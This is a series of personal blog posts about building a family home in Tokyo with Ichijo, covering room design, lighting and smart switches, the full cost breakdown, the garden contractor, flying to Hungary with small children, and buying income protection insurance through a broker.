szabo.jp

Home design ideas

2026-03-01T00:00:00+00:00

We recently built our home in Tokyo with Ichijo. I already wrote about the process of designing our house, and designing our lighting, and in this post I’ll write about the major design ideas we used for our house.

We have moved in about 3 months ago, so I can also share how well these ideas are working out. To protect our privacy, I decided not to share the full layout, so I’m sharing it as ideas and specific rooms.

Second floor living room

Lands in urban centers (especially in Tokyo) are small, so houses are often close to each other. Getting natural light was important for us, so we decided to put the living room on the second floor on the South-East side. Our land opens from the South, and the neighbor to the East is a single-story house, so this means the LDK (living-dining-kitchen) gets a ton of light, especially from the morning to early afternoon.

This way the balcony (on the South side) also opens from the living room, which makes it perfect for laundry. And since we have the bathroom and the washing machine also on the second floor, it is easy to hang the laundry. In the evening, it is also easy to move the laundry inside, as we have a laundry pipe in the living room near the balcony door.

Another benefit of the second floor living room is that the space over the stairs make the room feel more spacious.

Storage, storage, storage

You can never have enough storage. Especially in a house of 95 m2 (29 tsubo), it is very easy to run out of space, and then cleaning up becomes impossible. So we did our best to include as much storage as possible.

Attic storage

The biggest storage space we got is in the attic. The size of the land defines the maximum floor space of the house (e.g. 80%), however rooms with height under 140 cm don’t count. So it is possible to add an attic storage or loft without using additional floor space. Ichijo offers 2 solutions (both are paid options):

attic storage (屋根裏収納 or 小屋裏収納) - this is a separate room in the attic with a foldable ladder
loft (ロフト) - this has a fixed ladder and is open on one side, so the air is shared with the room

We got the attic storage, and it is such a life saver. It stores the suite cases, the skis, the baby bed we don’t use, seasonal decorations (e.g. Christmas tree), camping stuff (tent, sleeping bags, cart), etc. In previous apartments these would take up most of the walk-in-closet, but having a dedicated space for them is much better.

For more details, I recommend reading this blog post that goes into a lot of details.

Underfloor storage “train”

Under the first floor there is a crawl space, so many Japanese houses have an underfloor storage box. Ichijo goes a step further and instead of a single box, they install a “train” of boxes (3 or 5 “cars”) that slide back and forth. Ichijo calls this 床下パントリー (underfloor pantry). The main limitation is that the entire “train” has to fit without hitting a wall (as most walls continue in the crawl space).

We got this in the corridor of the first floor, and it is great. We store our earthquake emergency bag, bottled water, and our wines. I was struggling to find a good place for our wine collection before: I didn’t want to put them near the floor, as the kids could reach them, but putting them high would risk them falling in case of an earthquake. Keeping them here is (sofar) the best solution. This storage is outside the house and thus it gets cold in winter and hot in summer, so I might need to reconsider if this becomes an issue.

Under the stairs

Ichijo offers open and a box-style stairs, and if one chooses the box-style, then under that can become storage.

We use this to store the DIY tools (drill, sander, saws, etc.), the vacuum cleaner, and the recyclable trash. Our city collects the burnable trash twice a week (this is the catch-all for everything non-recyclable), but paper and plastic are only collected weekly, and PET, cans, glass only every two weeks.

House that grows with our family

As a teenager I remember how much I liked having my own room. So it was paramount for me to make it possible for each of our kids to have their own rooms. When we started designing our house, we only had a 6 months old baby, and a plan to have 2 more. So we don’t need 3 rooms now, we need 3 rooms in 10 years. (And that is assuming we do get 3 kids.) Meanwhile we don’t have enough space to let rooms sit empty, so we came up with a design that grows as our family and kids grow.

We put two kid’s rooms next to each other and removed the wall in-between. Each of them still have a dedicated door, a window, a ceiling light, but they became a single, big play room for now. We added carpet ourselves.

The third kid’s room was built as-is, however it currently serves as the family closet: this is where we keep all the kids’ clothes, and a diaper changing table. Originally we planned to keep our own clothes here too (so that the main bedroom gets enough space for the baby bed), but we could fit an IKEA PAX wardrobe and the baby bed in the bedroom.

Overall I’m really happy with this setup. The plan is that as kids get older, they will start sleeping in the play room, and when they get old enough to ask for their own room, we can split that room into two. This also leaves the option open to not split it: just because I wanted to have my own room as a teenager, my kids might decide to share a room.

Entrance (genkan)

The apartments we lived before always had a very narrow entrance (80-90 cm wide with a built-in shoe closet on one side). This worked great before kids, but once you try to fit a stroller in there, or try to get multiple kids dressed, it quickly becomes too small. So we decided to make ours wide.

Moreover I always had issues with where to hang my coats: my wife brings hers to the closet in the bedroom, but I’d rather leave them at the entrance. Also when we have guests, it is nice if they can hang their coats at the entrance. So we made sure to have space for hangers here.

We got the usual shoe closet, but I also found that we have things that don’t fit well in there: bicycle helmets, bicycle battery charger, keys. So we put another set of shelves on the side of the entrance door. We left the bottom of this big, so that the stroller can fit in there, and added some plugs in the middle, so that the bike batteries can be charged. This is great when I forget to bring the battery and have to come back to pick it up.

We also added a sink at the entrance. When we come home, we can wash hands immediately. Since the bedrooms are on the first floor, this can also be used for brushing teeth or putting on make up. Then there is a toilet on the first floor too, and we also change diapers in the family closet, so having a full-size sink comes handy. We got the sink from WoodOne (same as our kitchen), so it uses real wood, which makes it a nice first impression when entering the house.

Kitchen

I wrote about our journey of getting a custom kitchen, so I just want to quickly mention a few decisions we made.

We decided not to have overhead storage in the kitchen. These are very common in Japan, but they tend to break up the space and split the kitchen and dining space.

This meant that we have less storage, which we addressed in two ways. We made the cupboard one drawer higher than usual (for an overall height of 105 cm). Apart from the additional storage, this also made the top of the counter high enough to be safe from kids (at least for a while). Then we added a small pantry: on the layout we created an empty 91x91 cm square, asked Ichijo to reinforce the wall (so that shelves can be attached anywhere), then created an L-shape shelf system DIY, using materials from the home improvement store, Kohnan.

The last idea I want to highlight here is the place of the trashcans: we left out the bottom drawers of the cupboard at the end, and have the trashcans there. This keeps them close but out of the way. We have the burnable, plastic, and PET here.

Home office

I regularly work from home, so I wanted to have my own workroom/office. However when the entire house is 95 m2 and you want to fit in 4 bedrooms, there is just not enough place for one more full size room. So we made my office small: 125 x 170 cm. We added a (comparatively) large window to the room, which helps make it feel bigger, and made the door a sliding door. Since this room is on the second floor near the LDK, I can leave the door open when I don’t have any meeting, and I can hear if my family needs help.

Sofar the room turned out to be the perfect size: I have a small, 100*60 cm standing desk, and I added wall-mounted shelves behind the chair. Big enough to be comfortable, small enough that it can’t get too messy.

One potential problem though: the room is too small to have a dedicated air conditioner. It has floor heating, so in winter it’s fine, but in summer it will get hot. I have my home servers in this room too, as well as the networking box, and those won’t help with the heat either. The room does have a dedicated air-intake, so that should help a bit. I’m thinking of adding a dehumidifier or a fan if needed.

TV

This is a very minor thing, but something I’m proud of: I attached the TV to the wall in the living room, and hid all the cables behind it. We got sockets and an Ethernet port behind the TV, so the cables are all hidden, and safe from kids. We added an extra WiFi access point behind the TV already, and there is place to add our Nintendo Switch as well. Moreover having the TV fixed on the wall, makes it safe from falling, both from earthquakes and kids pushing it.

Flying with babies/toddlers is expensive

2026-02-11T00:00:00+00:00

We had our first kid 2 years ago and the second baby was born recently. We went to Hungary in both of the last summers, and will be going this summer too. I wrote about our experience the first time, and I will now write about why flying with babies and toddlers gets pretty expensive.

Layovers

There is no direct flight from Tokio to Budapest, so the two options we have is to either fly to Vienna and take a train or car from there (3 hours) or fly with a layover. Common layover options are:

Eastern Europe: Helsinki, Warsaw, Vienna, Istanbul - shortest travel time but less flight options
Western Europe: Munich, Frankfurt, Amsterdam, London - longer travel but more options
Middle East: Dubai, Doha - longer travel on both legs
China

Going with a Chinese airline is usually the cheapest, but there is risk, as customer service seems to be worse than others (especially with the recent flight cancellations, there are stories of people trying to check in just to realize the first leg of their trip was cancelled without any notification). So we excluded these.

Middle East layover usually provides a good price, but the tricky part is that both flights are rather long which can make the second leg difficult with kids. But otherwise this could work.

Western Europe does make the first leg longer, but otherwise could work. This time somehow the connection times were pretty bad though, like it gave us less than 2 hours for a connection in Frankfurt, which would be tight even without kids (especially as the flight from Tokio arrives to the non-Schengen area, so there is passport check before the flight to Budapest).

Eastern Europe seem to offer the best combination of short travel time and smaller airports.

Layover time also matters: it shouldn’t be too short (as there might be unexpected diaper changes) but also not too long. If it’s longer (4-5 hours) then we found that going into an airport lounge can be a good solution. Last year we had a 5 hour layover in Helsinki and went into the Finnair Schengen Lounge (5,000 yen per adult, free for the 1 year old), and it was totally worth it. Between coffee and breakfast we would have spent this much anyway, and the lounge had comfortable sofas (our kid took a nap there), quiet space, stress-free food and drink selection.

Timing matters

Before kids I didn’t mind taking any flights as long as it didn’t leave early morning or arrive very late at night. With kids however I want them to sleep on the long flight, so it should leave in the evening. Luckily most search sites (both skyscanner and the airlines’ own websites) let me filter for these. But this still reduces the available options.

Baby bassinet: it’s free, but

Most airlines offer baby bassinets for kids under 11-14kg, and it’s super helpful. To reserve this, airlines usually ask to call their customer center after making a reservation. Most of them say that the baby bassinet is for free, however some will charge for the seat reservation (as baby bassinet can only be installed in the bulkhead row which offers bigger legroom making it a premium seat option). The issue is that almost none of the airlines publish if they charge for this. Here is our experience with the airlines we flew/talked to:

ANA: added the seats for free for both parents
Austrian: charged for the seat reservation (had to give them my credit card on the phone and they charged around 30,000 yen for two seats, return trip. This was in 2024)
Finnair: they are actually the best in telling us how it works - they mark the seat on the seat map and you are required to book the seat during the booking. In 2026 this would cost 20,000 yen per seat per flight (Tokyo-Helsinki).
JAL: this was the worse. We booked a trip with Finnair and the return Helsinki-Tokyo leg was operated by JAL. So Finnair told us to contact JAL for seat reservation and the baby bassinet. When we called JAL, they told us that they will only assign one seat for free next to the baby bassinet. If the other two of us also want to sit there, then we should talk to Finnair to change our ticket to the type that includes seat reservation, then call JAL again. But even then they will only let one more person sit next to the baby bassinet, the third person will have to sit on the other side of the aisle or the row behind. We asked if we could just pay for the seat reservation, but they said no, we have to talk to Finnair. Luckily Finnair offers free cancellation within the first 24 hours (regardless of ticket type), so we cancelled the whole reservation.
LOT: this was the best. Based on this great blog post I called them before finalizing the reservation, and they could add the basinet and the nearby seats to the reservation. Moreover they gave us all 3 seats between the aisles for free. The Japanese number was busy, but I used Skype to call their Polish number where they helped me quickly in English. One thing to note: the agent wasn’t fully sure about the process, so it is possible that other agents might not give all 3 seats (the above linked blog post mentions only getting 2 seats for free).

So my ratings on this are:

Best (free seats): LOT and ANA
Medium (paid seats): Finnair, Austrian
Worse (not letting us sit together or pay directly for seat reservation): JAL

Ticket price

Finally the main reason flying with kids is expensive: ticket prices. So under 2 years old (without a dedicated seat), their ticket is cheap (10-20% of a regular fare), but once they are above 2 (or if they want their own seat before) then their ticket jumps to 75% of an adult fare. Then from 12 years old they pay full price. Kids get their own luggage allowance though, and from 2 they have their own seat and get food too.

Going from being a couple to a family of 4 we pay close to double, between being more limited in the flight selection and the additional tickets. And it’s only expected to go further up once the second kid turns 2.

Deciding the lights for our new house

2026-02-01T00:00:00+00:00

We recently bought land and built our home in Tokyo. I wrote about the general design process, and in this post I will write about how we decided our lights. We have moved in 2 months ago, so I will also reflect on how well our ideas are working out so far.

Lights are usually the last thing that gets discussed during the design process of a house (it starts with the layout and equipments, and only then the lights and sockets). Many people are tired by then and just accept whatever the architect proposes. We cared about every detail of the house, so we spent time deciding this, and looking back, it was worth it.

Looking for advice

We didn’t know anything about lights, so we looked for advice. Panasonic has a free light advice service: upload the layouts, add any comments/wishes, they provide a lighting plan (of course using only Panasonic lights). We got this, and overall it was not bad, but they added 30-40% more lights than what we ended up using. I think it’s still a good starting point (and can bring up new ideas), but one should remember that they are in the business of selling lights so they might recommend more than necessary.

We also had two 1 hour consulting session with a a freelancer lighting designer: we shared our almost finalized layout and lighting plan, and went through each room with him on an online call. It was super helpful, he had great advice, and since he was paid by us directly, he could recommend lights from multiple companies (and also tell us that we had too many lights). I can highly recommend him (but please note that he doesn’t speak English).

Keeping our options open

One overarching principal for choosing lights was to allow us to change them later. This was partially due to the inevitability of changing preferences (e.g. kids growing up and wanting a different light) and also to minimize the decisions we had to make immediately (we only had to decide where the light will be, we can change the exact design later).

カチットF

For all bedrooms, my office, and the living room we chose to get a カチットF type adapters and a simple ceiling light. These are the ones that are very common in rental apartments and it takes only a few minutes to change them:

The simple ceiling light still came with a remote that allows to change the brightness and color temperature. We had similar lights in our previous apartment, so we knew what we were getting. Also even the IKEA lights are compatible with this adapter, so if we ever want to change them, we will have multiple options.

Track lighting

The other changeable light we got were track lighting or lighting rails (ダクトレール) for the kitchen counter and the dining table. This has the same benefit as カチットF but in addition it lets you move lights and add multiple lights. Both are nice if we change the size of the dining table.

Replaceable “bulb” in the downlights

For places like the genkan, corridor, washroom, and kitchen, we wanted to get downlights. However the default one recommended by Ichijo had a non-replaceable bulb. It is supposed to run for over 10 years, and then you need to ask an electrician to rip out the entire light and install a new one (this involves rewiring it, so only people with the electrician certification are allowed to do it). This is supposed to keep the cost low, but I really hated it, so I asked for one with replaceable bulbs.

My first idea was to get a downlight with the normal E26 light bulb, but the architect said that those are very deep (as the bulbs are long) and they can’t be used on the top floor (they can’t fit due to the insulation). So he suggested one with a GX53 bulb, as these bulbs are flat, but still replaceable. The format is standardized so multiple companies are making them (at some point even IKEA was making them, although they stopped).

Being replaceable enables a few things:

if they are too bright, we can switch them to a lower power one (the opposite is usually not allowed due to power ratings)
if we want to change it to cold or warm white, it is possible
we can install a smart bulb if there is a need (the switches are smart already, so sofar I don’t have a use-case for this, but nice to keep the option open)

Warm white everywhere

For most lights, we could choose between cold, natural, or warm white. We were thinking between natural or warm, and I got the advice from someone that unless you are building an office or hospital, warm white everywhere is the best. The only exception is the washroom mirror for putting on make-up. So this is what we did: the downlights and bracket-lights are all 2700K, and the ceiling lights (カチットF) are set to warm using the remote.

Actually Ichijo’s washroom sink cabinet includes a normal-white light, so even in the washroom the downlight on the ceiling is 2700K.

After a few months in the house, this was a great idea. It gives the home a warm feel and helps prepare to sleep.

Low light for night action

We have two small kids, so between night feedings and diaper change, and later if kids wake up in the middle of the night, there is quite a bit of movement at night. We considered this during our design.

Night light at foot-level

These are small lights from Panasonic that come with either motion sensor or light sensor. We have the latter, so it turns on when it gets dark and stays on until the morning, giving the hallways enough like to walk safely. We also put one to the bottom and one to the top of the stairs: the advice here was that once you start walking on the stairs, it is easy to keep walking, so lighting up the two ends is enough. In practice those two actually make the entire stairs visible.

These really help not having to turn on the lights at night when going from one place to another.

Dimmable lights

We made most of the downlights dimmable. Right now this helps when I’m making formula for the baby or when changing diapers in the washroom, as we can keep the lights low to help us and the baby go back to sleep.

Auto-dimming toilet lights

For the toilets we added a motion sensor switch, so that the light gets turned on and off automatically. (We did consider using a smart switch and setting up the sensor ourselves, but one of the subsidies required the automatic switch.) We found one from Panasonic (WTK12749W) that supports ほんのり点灯モード which means that at night it turns on at a lower brightness:

Moreover this also controls the ventilation fan which stays on a few additional minutes (exact time is configurable) even after the light turns off.

We didn’t add a window in either toilet, but if you have a window, then this can also be configured to only turn on the light if it’s dark.

Smart lights

I looked into smart lighting options in Japan, tested the Panasonic Advanced Series Link Plus switches, and got it for our house. So all switches (except the toilet and bath) are smart and can be controlled via HomeAssistant.

This is turning out to be more useful than expected: after moving in we realized that some light switches are hard to reach, e.g. the kitchen counter’s switch is only in the corner of the kitchen, so when leaving and turning off everything, it is a bit inconvenient. But since it’s smart, I could add a simple IKEA Zigbee button to create a secondary switch. Since the use-case is turning off all lights on the floor, I configured one of the buttons to do just that (off all lights).

Where HomeAssistant and the centralized smart home really shines is when new lights are added. For example the Christmas tree lights: I used a smart plug for these, which also integrated with HomeAssistant, so then I could configure the turn off all lights button to also turn off the Christmas tree lights. Similarly we needed an extra light at the diaper changing table, and I could sync it with the ceiling light, so you just press the normal switch and both lights turn on.

Switches and sockets

We added a bunch of electric sockets, and sofar they are proving to be very helpful, so I recommend adding as much as you can.

Light switches: I’d recommend considering where you would want to control the lights from, and adding multiple switches for the same light to ensure all places are covered. For example for the kitchen counter you might want a switch right next to it (I’m cooking and it got dark) and also at the entrance of the LDK (I’m arriving/leaving the room). Same for both ends of hallways and also the genkan (one next to the entrance door, one where you go from the genkan to the rest of the house). These are less vital if you get smart switches (as you can always add extra smart buttons later), but otherwise I would put some thoughts into it.

Per room overview

Here is the type of light we got for each room:

bedroom: カチットF ceiling light
kids rooms: カチットF ceiling lights
office: カチットF ceiling light
toilets: dimmable downlight with the auto-dimming sensor switch
genkan: downlights
hallways: dimmable downlights and the foot light
storage under the stairs: bracket light with GX53 bulb
stairs: bracket lights with GX53 bulb and the foot light
LDK:
- living room: カチットF ceiling light
- dining: rail with a hanging lamp over the dining table. Also dimmable downlights
- kitchen: dimmable downlights and rail with two spot lights over the kitchen counter - this was a bit of an overkill, the downlights would have been enough, but we were thinking about getting some pendant lights for the counter initially
washroom: dimmable downlight
bathroom: downlights (this came built in with the unit bath)

The full cost of building our house in Tokyo

2026-01-28T00:00:00+00:00

We recently bought land and built our home in Tokyo. I have wrote about the various costs, but in this post I’ll provide the full breakdown on how much our home cost.

Summary

The overall cost was 110 million yen (１億１千万). The land (and related expenses) were 69 million and the house (and related expenses) cost 41 million yen. We covered 109 million yen from the mortgage and only paid out-of-pocket the remaining 1 million yen.

The price of the land alone (64.3 million) and the house construction (35.6 million) add up to 100 million yen, while all the remaining costs added another 10%. Luckily many banks in Japan let you include these costs in the mortgage, which helped us keep the out-of-pocket expenses to the minimum.

Land portion

I covered this in detail in an earlier post: the land was 64.3 million yen and we paid another 4.4 million in fees (2 million to the real estate agent, 1.5 million as the loan guarantor fee).

House portion

The house was overall 41.6 million yen. I covered most of these in earlier post:

Item	Price	Earlier post with details
Building the house (Ichijo)	¥35,605,327	The cost of our Ichijo house
Garden and exterior construction	¥2,684,000	The garden of our new house
Connecting the land to the water pipe	¥1,223,035	Our land didn’t have a connection to the water works’ pipe, so we had to get it done. (Usually when the land had an old house this won’t be necessary.)
Loan guarantor fee	¥897,600	2.2% of the mortgage amount, same as for the land. We could have chosen a higher interest rate instead of this fee, but on the long-term this option is better.
Property registration and scrivener fees	¥290,000	Miscellaneous expenses while building our home in Tokyo
Bridge loan interest	¥243,274	Timing of the payments for the house, and the bridge loan (つなぎ融資)
Home insurance for 5 years	¥175,633	Home insurance in Japan
Curtains	¥174,000	Curtains for our new house
Design application and filing services	¥154,300	Miscellaneous expenses while building our home in Tokyo
Wifi and home network setup	¥129,103	Home network setup for our new house
Overall	¥41,576,272

What is on this list is a bit subjective. Some people might skip things (e.g. wifi, curtains), and there were other costs (e.g. moving, new furniture) that could be included as well.

Subsidies

A major category that I intentionally skipped here are the subsidies for energy efficient housing and solar panels. These depend on the location, and also on the exact year a house is built, so I think leaving them out makes this post more useful. Moreover they are only paid out 6-12 months after the house is completed, so they don’t help with the immediate cashflow. I will cover them in a separate post.

Necessary cash at hand

So the out-of-pocket expense was less than 1 million yen. Does it mean I can get a house if I have only 1 million yen in my bank account? Not really, as there were costs that I had to pay first and then got the money back from the mortgage. Overall I needed around 5 million yen to go through the whole process. The major expenses were:

2024 January: signing the pre-contract with Ichijo and paying a 1 million yen deposit (refundable)
2024 March: made an offer on a land and had to pay 3 million yen deposit
2024 May: closed on the land and got the 3 million yen back from the mortgage
2025 June: 1.2 million yen for the water pipe connection work
2025 July: 1.3 million yen for the first half of the garden construction
2025 November: finalized the mortgage for the house and got 3.2 million yen extra (for the garden and the water pipe connection work)
2025 December: got a bit of the 1 million yen deposit back from Ichijo - most of it was spent on the misc expenses (bridge loan, registration fees, application fees)
2026 January: 1.3 million yen for the rest of the garden construction

In addition to this, I also had to pay for the mortgage on the land. My bank let me pay only the interest for the first 12 months. It added up to 133,274 yen in 2024 (since only the interest) and 1.2 million yen until moving-in in November 2025 (I had to start paying the principal too from May). I’m using the moving date as the cut off, since until then one has to pay rent and these costs at the same time.

Without the water pipe connection work, with a cheaper garden, a lower land deposit, and a faster timeline (so less mortgage) I think one can push down the necessary cash to around 3 million yen. But don’t forget to also account for the moving costs and buying some new furniture, so I wouldn’t cut it too close.

The garden of our new house

2026-01-27T00:00:00+00:00

We recently built our home in Tokyo with Ichijo. One thing that surprised me was that the house maker companies only build the house itself, and leave the outside construction to another company. This was the case with Ichijo too, so we had to arrange the garden with another company.

Our idea

Similar to most of Tokyo, our land is pretty small, so doesn’t leave that much space for a garden. We also wanted to have a few things:

car parking for our minivan
a cycleport (roof for our bikes)
a mailbox with locker for parcels (宅配ボクス)
some tree or other greenery, if possible

I thought this was a pretty basic idea. Later we learned that the “basic idea” is to have concrete in the front, gravel in the back, and call it a day.

Ichijo’s introduction

Ichijo told us that they will introduce their partner company that can handle the exterior construction work. I believe the usual flow is that they will finalize the house fully before connecting you with the garden company, but we asked to meet with them earlier as we wanted to add some external lights on the house and the placement of those would depend on the outside design.

I got the feeling that this company was really good at handling the simple requests (pour concrete in the front, add gravel in the back, install the interphone and mailbox near the entrance), but they weren’t well equipped to do design work with us, give us advice, or suggest alternatives. (Or maybe we just got unlucky with our contact person.)

Their first plan was already around 2 million yen, and once we asked for the additional things it quickly jumped to near 3 million yen. Also the topic of Musashino City being strict about garden structures came up and they essentially told us that no cycle port can fit the rules, so we either shouldn’t get one, or just risk getting caught. After I looked up the rules online and sent them by email, they finally sent us a design that included a cycleport (even though it was one with 4 legs instead of 2 that we requested). Overall our experience wasn’t good, so we decided to find another company.

On the other hand we have two friends who built with Ichijo, and they both went with the Ichijo-introduced company, and they were fine. So we might have gotten a bad sales person, or simply we had too many unfinished ideas that just needed a different style company.

The local company: Palgreen

My wife found a local landscaping company, Palgreen. We had our first meeting, and we were very pleasantly surprised: we got to talk with someone who was really working with us. He was listening, but also challenging our ideas and giving alternatives. I had the idea to have interlocking tiles, because I thought that it is easier to repair and if we want to adjust the amount of greenery it makes it possible. He told us that usually you still need concrete under the tiles otherwise they will sink (especially where the car goes), so we ended up choosing simple concrete.

He also had really good ideas about lighting, e.g. we added some floating lights at the stairs.

We also have a small corner that the other company planned to just pour gravel over, but he insisted on not wasting that and adding either a wooden deck, grass, or artificial grass. We had a good discussion on the pros and cons of real vs artificial grass, and decided to go with the latter.

He prepared graphics of how it will look like, and he really took the time to find the place for everything. Overall we met with him 3 times, each time taking a couple of hours.

Timeline

We met with Palgreen in January 2025 first (so 1.5 months before the house design was finalized), then once more in February, and once again in June.

We signed the contract in June 2025, after the house construction started.

They could only start the work after the house was completed and handed over, which happened at the end of October. Since the house is ready at this point, some people move in before the garden construction completes, but we thought that both the moving and the daily life would be a bit difficult with all the construction in front of the house, so we decided to only move in after they finished the garden.

However in the end the construction got delayed and we ended up moving in when the outside was not fully finished. Overall this wasn’t that big of a deal: we had one or two days when we had to walk on a small bridge while the concrete was solidifying, and we couldn’t park the car at the house (but they paid for the nearby coin parking).

They said that the delay was due to bad weather causing a delay on their previous work, which meant they couldn’t start ours on time. I guess this is the downside of a smaller company: the bad weather was a few days of rain in October (which is not exactly unexpected), but if they only have 1 or 2 people that can do a given task, then I can see how they didn’t have the people to start our construction on time.

There was also a bit of communication issue here: the designer and construction manager were different people, but neither of them reached out to us about the delay. We asked after a week or so when there was no work being done, and then they told us about the delay, but this is something they could improve.

Cost

In the end the price was 2,684,000 yen, but considering all the additional things we added (lights, artificial grass, multiple plants), I think we got a good deal. We paid half of it after signing the contract, and half after the garden was done. The bank let us include this in the mortgage too.

Here is the breakdown of the costs:

Japanese	English	Amount
仮設工事	Temporary works	¥96,800
土工事・解体工事	Earthworks & demolition	¥312,543
組積工事	Masonry works	¥201,344
舗装工事	Paving works	¥768,108
金物工事	Metal works	¥642,631
タイル石貼り工事	Tile & stone installation	¥152,218
電気工事	Electrical works	¥244,723
植栽工事	Landscaping / planting works	¥273,339
端数調整	Rounding adjustment	-¥7,706
合計	Overall	¥2,684,000

We also got a fully itemized list of things that they used during the construction.

Design ideas

Overall I think our setup is pretty simple. Still, here are some things we did that I would recommend to others.

Mailbox with locker for parcels (宅配ボクス)

These are very common in Japan. Next to your regular mailbox, you also get a box for parcels: it can be locked without the key (by the delivery person) but you need a key to open it.

Our original design had the same model included, but I decided to change it in the end. So my problem with the original setup was that the mailbox and the parcel box would open with separate keys. So when I’m coming home, I have to get two keys out, and unlock to locks. After sharing this concern with Palgreen, they suggested a new model from Panasonic: Combo Multi (ポスト一体型宅配ボックスコンボマルチ). This solves the problem by using a pin to unlock (instead of a key) and having a single door on the back for both the postbox and the parcel box. It even has a version that has two sections for parcels, but you can also have a single, bigger section.

This was a 2025 model, so it was a bit more expensive than the original one, but after using it for a few months, I can confidently say that it was totally worth it. It takes me only a few seconds to check if we got mail or parcel, and it also looks better. (I really like the sleek design.)

Stroller-friendly stairs

The entrance of most houses are higher than ground level, so there are usually a few steps. Combine this with a usually small genkan, and using a stroller/baby-car becomes difficult. So instead of simple stairs, we got long steps where the stroller can take one step at a time. Something like this:

Plan for bicycles

I’m a firm believer that bicycles are the best way to get around in any big city, and this is double true for kids that can’t yet drive. You might not go as far as we did with the cycle port, but at least have some plan on where the bikes will be parked. I have seen some houses where the bikes were parked around the car, and that looks pretty inconvenient for users of both the car and the bikes.

Use all available space

Gardens in Tokyo are small, which is made even worse by garden companies that are keen on covering most of it with gravel. If possible, consider building a wood deck or have some (artificial) grass instead. We got some artificial grass next to our house, and it gives the kids one more place to play.

We were considering artificial grass vs real grass, as the latter is cheaper to make, but decided with the former to reduce the ongoing work: I really don’t feel like watering and mowing a lawn that’s smaller than our living room.

Final thoughts

Overall I’m really happy that we went with Palgreen for the garden construction. Their support in designing the garden was super helpful and their ideas proving to be very useful. They did run into a few weeks delay and didn’t communicate it well, but otherwise no complaints. I would recommend them to anyone, so drop them a message if you are looking for a company like this.

Choosing my life insurance - part 2

2026-01-20T00:00:00+00:00

I recently decided to get life insurance (収入保障保険), but I couldn’t complete the sign-up online. This is the second part of this story, so I recommend reading part 1 first.

My options

So after I couldn’t complete the online sign up (due to getting a grade B on my yearly health check), I was left with 3 options:

Call the insurance company to explain the health check results
Go with a different insurance company (that’s more expensive and might result in the same situation once they review my health check results)
Use an insurance broker to sign up for the insurance

I decided to go with option 3.

Choosing the insurance broker

It seems most life insurance in Japan is sold through brokers, and usually one broker has contract with many insurance companies. So next I searched for insurance agency on Google Maps around where I live. Two options came up (保険見直し本舗, ほけんの窓口), and I was very surprised that they had 4.5 and 4.9 star ratings on Google Maps.

I have never seen this type of rating in Japan, unless it’s a place for tourists (and life insurance is definitely not for tourists). Upon looking at the comments, the people seemed to be genuinely happy with the service (so it wasn’t just a bunch of empty 5 star reviews that could be bots, there were seemingly real comments on how great the service was). Still I had my doubts: insurance salespeople have a reputation for a reason.

I decided to go with ほけんの窓口 for the two simple reasons that they were slightly closer, and that I was familiar with their name (I saw their shop elsewhere). So I made a reservation online for the 10am slot on Monday.

Preparing for the meeting

My Japanese is only around N3 (and even there I would probably fail on the grammar part), so I was worried about how the meeting would go, especially if they would try to up-sell me some high-fee life-insurance-mixed-with-investment type deal.

So when making the reservation I wrote this in the comment field (thanks to ChatGPT for writing it for me):

収入保障保険について相談・申込みを希望しています。

健康診断の心電図でB判定があり、オンライン申込みでは手続きが途中で進められなくなったため、来店での相談を希望しました。当日は健康診断結果を持参します。

希望条件は、60歳まで・月額30万円程度の保障です。今回は収入保障保険のみ検討しており、ライフプラン作成や他の商品提案は不要です。

日本語の会話は専門的な内容だと少し不安がありますが、スマートフォンで翻訳しながら対応可能です。数字や保障内容、スケジュールなどを画面や紙で見せていただければ理解できると思います。

事前に自分なりに調べており、収入保障保険の仕組みについては基本的な理解はあります。よろしくお願いいたします。

In English this means:

I would like to consult and apply for income protection insurance.

I received a B result on my electrocardiogram during my health checkup, and was unable to proceed with the online application, so I requested an in-person consultation. I will bring my health checkup results with me on the day.

My desired coverage is approximately 300,000 yen per month until age 60.

This time, I am only considering income protection insurance, and do not need a life plan or other product suggestions.

I am a little worried about speaking Japanese due to the technical content, but I can use my smartphone to translate. I think I would be able to understand if you could show me the numbers, coverage details, schedule, etc. on a screen or on paper.

I did my own research in advance, and have a basic understanding of how income protection insurance works. Thank you in advance.

Then I prepared additional documents, as it is often easier to show something than to describe it (and it also leaves less room for misunderstandings/errors). I know that more privacy-conscious people would despise this approach (as it gives the insurance agent information they don’t strictly need), but I’m more relaxed about this (and I took all the documents back in the end). So I brought the following documents with me:

health check result
the online quote and option selection (just printed the website) - for reference on the options and price
my business card - I expected them to ask for my employer and work title
last year’s salary (the one I got from my company at the end of the year) - I expected them to ask for my yearly salary (the online application also did)
residence registry (住民票, without MyNumber and 本籍) - this had unnecessary details, but I had to provide information on my wife (name, address, DoB) as she is the beneficiary, and I expected that they might ask about my kids too (though they didn’t)
copy of my employer’s life insurance - in case they ask about other life insurance I have. It came up, but only in the context of “are you cancelling another plan to get this new one?” - somehow that would have been an issue, but getting additional coverage is apparently fine

I also prepared a list of vocabulary, but only really used 収入保障保険 from that. Still it was nice to have it printed just in case.

One point I failed to prepare for was any hospital visit from the last few years. I only have been to the dentist (fixing some cavity) and got a mole removed by the dermatologist, so I could explain them easily, but next time I will prepare better. Btw he said that these are not issues that need to be reported to the insurance company, they only care about major medical procedures.

The meeting

It took 1.5 hours and by the end I successfully signed up for the insurance I wanted.

Turns out the reviews were correct: the guy was indeed really nice and did not try to up-sell anything at all. Once he saw that I had the FWD Life quote printed, he said “yeah, he would recommend that as well” and quickly switched into explaining the details. Not trying to recommend another company or another product, simply doing what I asked for.

We went through all the details of the insurance and the options. I have researched this ahead of time, so it was easy to follow. At each option he stopped to confirm my choice, but did not push or ask for me to reason about my decisions.

Overall it felt similar to real estate agents explaining the contract, or the bank employee explaining the mortgage details: they have a strong legal requirement to explain every single part of it, so they do their best to do so. The guy was also good at using simpler Japanese and giving examples (e.g. when the topic of insurance coverage in case of permanent disability came up, he was saying “for example if you can’t hear or speak, or if you loose a leg, then this will start paying even if you are still alive”).

At some point I wanted to use Google Translate to translate part of the contract that he was showing on the screen. He said it’s not okay to take photos of the screen, but he printed it for me already, so I can translate the printed version.

He did briefly talk about his company, ほけんの窓口, but only for a few minutes:

they have contract with multiple insurance companies (he showed me the list)
this includes life and non-life insurance, like home or car insurance
they are happy to review existing insurance and give advice
contracts made through them will be the same price as if made directly with the insurance company (I found this hard to believe, but indeed the contract was the same price that I got on the insurance company’s website)
they work in a franchise setting, so visiting another branch will not have visibility into the data I shared with them (hinting at that I should come back to this exact location)

I expected some push on car and home insurance (like “do you have a car? how is your current insurance?”) but no, he just mentioned that if I need help, let him know.

